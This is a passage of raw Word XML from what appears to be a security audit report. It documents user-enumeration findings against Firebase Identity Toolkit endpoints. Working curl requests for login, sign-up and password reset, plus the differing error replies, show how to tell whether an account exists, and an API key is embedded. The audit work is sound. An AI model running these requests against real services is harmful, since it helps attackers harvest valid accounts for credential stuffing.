          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>","password":"1234","returnSecureToken":true}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId163">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyCc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> o5iR98OSW_Jujby4V9sXVO6EtNJYhmU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exist):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"EMAIL_NOT_FOUND"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>oscar+b2@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>","password":"1234","returnSecureToken":true}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId163">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyCc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> o5iR98OSW_Jujby4V9sXVO6EtNJYhmU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exists):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"INVALID_PASSWORD"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alternative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exists):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"TOO_MANY_ATTEMPTS_TRY_LATER[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="65"/>
        <w:ind w:right="4802"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SignUp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>oscar+b2@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>","password":"123456","returnSecureToken":true}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId165">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key=AIzaSyCco</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> 5iR98OSW_Jujby4V9sXVO6EtNJYhmU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exists):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487613952">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>225440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="75" name="Graphic 75"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="75" name="Graphic 75"/>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7.751259pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15702528;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape60" coordorigin="1440,355" coordsize="2880,0" path="m1440,355l4320,355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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId166">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/Credential_stuffing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"EMAIL_EXISTS"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="64"/>
        <w:ind w:right="4309"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Reset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"requestType":"PASSWORD_RESET","email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId162">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>oscar+b0@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId167">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> AIzaSyCco5iR98OSW_Jujby4V9sXVO6EtNJYhmU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exist):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"EMAIL_NOT_FOUND"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
